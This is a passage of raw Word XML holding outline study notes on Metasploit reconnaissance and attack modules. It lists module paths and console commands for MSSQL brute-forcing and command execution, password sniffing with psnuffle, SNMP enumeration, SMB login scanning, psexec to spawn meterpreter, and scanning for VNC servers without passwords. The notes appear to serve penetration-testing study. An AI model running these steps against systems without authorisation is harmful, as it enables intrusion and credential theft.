      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ping module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF7FB0C" w14:textId="73240BA0" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/mssql/mssql_ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DEFCB3" w14:textId="754EAA01" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>scanner/mssql/mssql_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DCE604" w14:textId="53068D03" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>brute-force password (can also use medua, THC-Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C9391" w14:textId="51EE2587" w:rsidR="00740101" w:rsidRDefault="00740101" w:rsidP="00740101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then use auxiliary/admin/mssql/mssql_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38228608" w14:textId="5F3A27F3" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SERVICE IDENTIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B739C" w14:textId="3954531B" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73050095" w14:textId="1CAF1503" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>services -p &lt;port&gt; -c name,port,proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5E5EA" w14:textId="0D7634E1" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/ssh/ssh_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD754B0" w14:textId="6764CFAD" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FTP Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218016B0" w14:textId="435642E2" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>services -p 21 -c name,proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50AC8B" w14:textId="37B7B90D" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/ftp/ftp_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42F367" w14:textId="556B49DE" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD SNIFFING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFDB061" w14:textId="151C2C60" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>psnuffle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF1D5D" w14:textId="30B10845" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>similar to dsniff tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297067A" w14:textId="24BE4A9E" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sniffs passwords for POP3, IMAP, FTP, HTTP GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33414546" w14:textId="08602B67" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/sniffer/psnuffle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6DBE85" w14:textId="1B904BAF" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>can also import pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B42E74" w14:textId="662B0CDC" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>EXTENDING PSNUFFLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9933C2" w14:textId="0B1D796F" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Module Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C84615" w14:textId="2F25BF37" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>data/exploits/psnuffle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625756C" w14:textId="70075195" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Define own psnuffle module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1B0B2" w14:textId="3063F090" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Session Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0510A426" w14:textId="32290971" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>define ports, session tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BF9F5" w14:textId="42DE11EE" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>session objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62B32C" w14:textId="0683B7E6" w:rsidR="00D658D3" w:rsidRDefault="00D658D3" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SNMP SWEEPING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632B073" w14:textId="2F98A122" w:rsidR="00D658D3" w:rsidRDefault="0022663E" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>‘read only’ and ‘read write’ community strings play an important role in what type of information can be extracted or modified on the devices themselves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A5F3C" w14:textId="154E82C2" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="00D658D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Must change default configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAFD07" w14:textId="1721822F" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/etc/default/snmpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69056011" w14:textId="531C8C68" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BF3AD" w14:textId="09435284" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0022663E">
        <w:t>SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C15888" w14:textId="50E24A66" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D105C" w14:textId="15BF658B" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0022663E">
        <w:t>SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7378C" w14:textId="030D943F" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>restart service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCE930" w14:textId="5C329A77" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MIBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CAE42" w14:textId="7872D0C4" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit has MIB db to query devices for information depending on what level of access is obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BFD7F3" w14:textId="316E650D" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search snmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73277970" w14:textId="2EF2773A" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/snmp/snmp_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4BDBE" w14:textId="68FD03A6" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SNMP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81E24D" w14:textId="6C69F0C0" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/snmp/snmp_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745E369" w14:textId="0845084B" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WRITING OWN SECURITY SCANNER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BDC51" w14:textId="64561884" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scanner Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F777C3" w14:textId="1B598A35" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>access to all exploit classes and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5517CD19" w14:textId="243A8E2F" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>support for proxies, SSL, and reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D68DA" w14:textId="3E624109" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>threading and range scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65C312" w14:textId="0C029847" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>easy to write and run quickly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A988647" w14:textId="57ABDC82" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Saving and Testing Auxiliary Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773748B5" w14:textId="59A85940" w:rsidR="0022663E" w:rsidRDefault="0022663E" w:rsidP="0022663E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>./modules/auxiliary/scanner/ directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74D12E" w14:textId="720EB350" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;filename&gt;.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390208B0" w14:textId="4FF788F6" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>must restart service and pay attention to folder structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E25CC" w14:textId="6513C0DD" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>can also use report mixin as report_*()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DAD68C" w14:textId="1CAB3A07" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>depends on databases running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDE460" w14:textId="60953E92" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use Auxiliary::Report mixin in scanner code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E5422" w14:textId="34802681" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>include Msf::Auxiliary::Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3351F283" w14:textId="61EA1722" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then call report_note() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C866324" w14:textId="327E416C" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WINDOWS PATCH ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A089D4" w14:textId="0AB72D8D" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use post/windows/gather/enum_patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B2169" w14:textId="790E7601" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD20F81" w14:textId="390F28EB" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A18402" w14:textId="1D5C7E02" w:rsidR="00177B31" w:rsidRDefault="00177B31" w:rsidP="00177B31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VULNERABILITY SCANNING IN METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005AC4EF" w14:textId="00DBFC9A" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SMB Login Check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127656F2" w14:textId="109A4A37" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scanning for Access with SMB_Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DDACE" w14:textId="26FA13B1" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>connects with a range of hosts and determines if username/password combination can access the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2269E" w14:textId="67D08A0C" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>very loud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CDDED" w14:textId="17AFA075" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB5BC1" w14:textId="4F265FE0" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>spawn meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38F496" w14:textId="47CCF8D2" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VNC Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D727598" w14:textId="3DACF25E" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAC3F6" w14:textId="0D817FB5" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>search a large range of IP addresses looking for targets that are running a VNC Server without passwords configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CEC7D" w14:textId="51C96AE8" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use auxiliary/scanner/vnc/vnc_none_auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371737F3" w14:textId="7C2A4DE1" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>WMAP Web Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFAAB05" w14:textId="6D029FC2" w:rsidR="00E33426" w:rsidRDefault="00E33426" w:rsidP="00E33426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Originated from SQLMap, integrated with Metasploit</w:t>
      </w:r>
    </w:p>
